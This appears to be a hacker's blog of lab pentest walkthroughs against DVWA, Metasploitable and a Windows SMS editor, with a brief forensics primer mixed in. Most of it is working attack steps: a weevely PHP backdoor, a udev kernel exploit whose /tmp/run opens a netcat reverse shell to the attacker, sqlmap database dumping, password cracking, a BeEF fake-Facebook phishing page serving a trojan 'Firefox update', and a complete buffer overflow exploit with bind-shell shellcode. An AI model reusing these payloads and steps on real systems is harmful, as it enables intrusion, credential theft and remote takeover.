DVWA Medium Level (part 2)

first genetrate backdoor using weevly
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o /var/www/door.txt -p testing

then using command execution vulnerability of dvwa to download the backdoor.

after that, using weevly to access the backdoor.

root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://192.168.56.101/dvwa/door.php -p testing

until here, we can see that we just on user www-data, so to gaining the root we have to exploit the kernel.
here i will exploit the udev, because udev is the device manager for the Linux kernel.
for more information about udev, please visit here or here


search udev on exploit db

we can see the usage that we have to pass the PID by - 1 of udevd. then the exploit will execute /tmp/run as root.
now copy the exploit to /var/www/

after that, download the exploit to system target


[www-data@metasploitable /var/www/dvwa] wget http://192.168.56.1/8572.c

then, compaile it and i wiil use reverse shell via netcat.

[www-data@metasploitable /var/www/dvwa] gcc -o tes 8572.c

[www-data@metasploitable /var/www/dvwa] echo '#! /bin/sh' > /tmp/run

[www-data@metasploitable /var/www/dvwa] echo '/bin/netcat -e /bin/sh 192.168.56.1 1234' >> /tmp/run

we can see that the udevd have been running on PID 2290 and run as root.


then running the nc and listen on port 1234 (on our bt)
root@bt:~# nc -lvp 1234

after that execute the exploit by type (on terget)

[www-data@metasploitable /var/www/dvwa] ./tes 2289                           (2289=PID 2290-1)

so we can see the id, we are on root.

Introduction to Computer Forensic

Computer forensic is the application of computer investigation and analysis technique to gather evidence for presentation in a court of law.

Unallocated space, sometimes called “free space”, is logical space on a hard drive that the operating system, e.g Windows, can write to. or for easly is the space of harddrive that not used.

 To put it another way it is the opposite of “allocated” space, which is where the operating system has already written files to.

Slack space is the unused space between the end of the actual file and the end of the the defined data unit (cluster). Slack space refers to portions of a hard drive that are not fully used by the current allocated file and which may contain data from a previously deleted file.

Command linux for forensic :

• fdisk -l /path/
• md5sum /path/
• dd if=source  of=detination     --> ("if" meaning "input file" and "of" meaning "output file").     
• strings /path/

DVWA Medium Level

first way.
first i try to use vulnerable of file inclution. (to collect some user)

and we can see, we got some user (root, msfadmin, user, etc) 

then i try to search vulnerability of ssh

after that i use user root and search the ssh key

we can see that we have found the key. now try to connect using ssh

and we have entered as root... :D 

second way. 

here, i use sqli and file inclution.

first, open dvwa --> sql injection

after that, open burpsuite

and then copy the cookies into sqlmap

here, i want to enter into mysql, so i have to search the password of mysql. so type this.

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "security=medium; tz_offset=25200; PHPSESSID=d2f440d1772f9b9ed69c7a74b926caf9" --level=3 --risk=3  --dbs -D mysql --tables

then dump the table user 

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "security=medium; tz_offset=25200; PHPSESSID=d2f440d1772f9b9ed69c7a74b926caf9" --level=3 --risk=3  --dbs -D mysql -T user --dump

and we can see that there is no password for user root

then enter to mysql command line

root@bt:/pentest/database/sqlmap# mysql -h 192.168.56.101 -u root -p

then load the file inclution. and we can got some user.

after we known the user, using medusa to find out the password 

then, connect it using ssh.

here i use user msfadmin because i have tried to use other user but i can't gain the root

alhamdulillah ... :D

note : in second ways, i have tried it on security high and it works ... :D

Client side attack using BeEF and Metasploit

now i try to exploit web browser using BeEF when they try to open facebook

when they try to open www.facebook.com, i will leads it to my fake login facebook (facebook.html) which i have put BeEF.


run the BEef

this is my script facebook.html and i have put BeEF in it.

then, after they have access my fake login facebook, see on our beef panel

we can see that browser target's have exposed our hook BeEF.

then, i will send updater firefox to target, but i will make the payload update.exe first using msfpayload and msfencode.

we can see that our payload update.exe have been created.

then run metasploit (msfconsole) to listening on port 1234

and send it to target

then execute it.

then, after they download and run our updater (payload), we will leads into meterpreter (target system).

Vulnerability of Metasploitable (samba)

first, gathring a lot informations of metasploitable
root@bt:~# nmap -sV 192.168.56.0/24

we can see that the risk factor of samaba is critical

then i try to use metasploit framework.

root@bt:~# msfconsole

then search the module of samba

then i use exploit/multi/samba/usermap_script. (i use it because the rank is exelent)
after that, see the options.

so have to set the target (set RHOST 192.168.56.101)
then exploit.

alhamdulillah... :D we have entered in root (type id)

to another password use lfi (local file inclusion)

then crack it use jtr. (i copy the it and save it with name pass.txt)

root@bt:/pentest/passwords/john# ./john /root/metasploitable/pass.txt

based the picture above, we can see some user and password...  :D

for make sure the user and password works, i try to access the system use telnet. (user : user & pasword : user)

and it works.... :D

Buffer Overflow SIM Editor

first, we have to make fuzzer to make the application crash.

#!/usr/bin/python
nama = "sms.sms"
junk = "A" * 2000
file = open(nama,'w')
file.write(junk)
print ("sukses ...")
file.close()

we can see, that EIP was successfully overwritten by our junk.

now try to find out the offset by manualy, because after i try to create 2000 pattern and paste it into our fuzzer, it not works. the application not crash. so i try to find out the offset by manualy.
first step, i try to divide the buffer to be two parts like this.

#!/usr/bin/python

nama = "sms.sms"

junk = "A" * 1000
junk+="B"*1000

file = open(nama,'w')

file.write(junk)

print ("sukses ...")

file.close()

then i got the results like this.

we can see that the EIP was successfully overwrittern by our junk "A". so we can conclude that we can find the offset under 1000. the try to divide it again.

#!/usr/bin/python

nama = "sms.sms"

junk ="A" * 500
junk+="B"*500
#junk+="C" * 1000

file = open(nama,'w')

file.write(junk)

print ("sukses ...")

file.close()

then i got the results like this.

so we can see that the EIP will be overwrite between 1000 and 500 by our junk. then try to divide it again until we get EIP. here i got the offsett on 818.

#!/usr/bin/python

nama = "sms.sms"

junk ="A" * 818

#junk+="B"*82

#junk+="G" * 1000

file = open(nama,'w')

file.write(junk)

print ("sukses ...")

file.close()

next step, try to control the EIP. here i want to control using DEADBEEF. different like previously, here we have to write the DEADBEEF without "\x". why ?? because the application only read characters of ASCII.


#!/usr/bin/python
nama = "telepon.sms"
junk ="A" * 810
junk+="EFBEADDE"
#junk+="B"*82
#junk+="G" * 1000

file = open(nama,'w')

file.write(junk)

print ("sukses ...")

file.close()

next step, search module to use as stepping stone. here i use module shell32.dll

then, double click on shell32.dll and then search the command JMP ESP. after we found the address, write it on our fuzzer. and don forget to breakpoint the address for make sure that we will leads to address shell32.dll

#!/usr/bin/python

nama = "telepon.sms"

#junk="A"*2000 # yang pertama

junk ="A" * 810

#junk+="EFBEADDE" #7C9D30D7   FFE4             JMP ESP

junk+="D7309D7C"

#junk+="B"*82

#junk+="C"*100

#junk+="G" * 1000

file = open(nama,'w')

file.write(junk)

print ("sukses ...")

file.close()

so we can see that the process will be stop when access on address 7C9D30D7.

next step, make tha payload

#!/usr/bin/python
nama = "telepon.sms"
#junk="A"*2000 # yang pertama
junk ="A" * 810
#junk+="EFBEADDE" #7C9D30D7   FFE4             JMP ESP
junk+="D7309D7C"
#junk+="B"*82
#junk+="C"*100
#junk+="G" * 1000
nop="90"*16

#/* win32_bind -  EXITFUNC=process LPORT=4444 Size=344 Encoder=ShikataGaNai http://metasploit.com */
payload=("ddc431c9b151d97424f45fb8b0b40c4c"
"3147170347178377b0eeb98bd3050c9b"
"dd2570a47e51e37e5beeb942288c44c2"
"2f82cc7d28d78ca1490c7b2a7d597dc2"
"4f9de7b634dd6cc1f51481cc37436ef5"
"e3b0a77ce932e85af0af7129fe64f572"
"e37be28f37f77de3631b1f385af8bb35"
"decec809eda5bf9540327fadc42d0ee3"
"f6415e04d0fc0c9cb53381083147d797"
"e958c74fd94a14b48d6b3395a471daa8"
"5a7121ffce80da2f665c2d3ada09d112"
"76e57ec92a4ad2ae9fb30456485df9f0"
"dbd4e069b342f8e183dc02d766f3ad82"
"89232588dbea5f87dc25cc72dc1a9b99"
"6b1d153693f7f6ec3fad09dc532511a5"
"95cf8aaacc65ca8497ef50423093f503"
"2539564a8f72df8ba5ce69b10b0f9a9f"
"92cd702128fe1950d7c6b6c1835fbbeb"
"6789c466cc49ecd39be740b272626265"
"2427357a16af185d92fe30a24b9449a3"
"439666d0fb940422679addf897b48a82"
"bfd73829bfce401d")

file = open(nama,'w')
file.write(junk+nop+payload)
print ("sukses ...")
file.close()

Alhamdulillah ...:D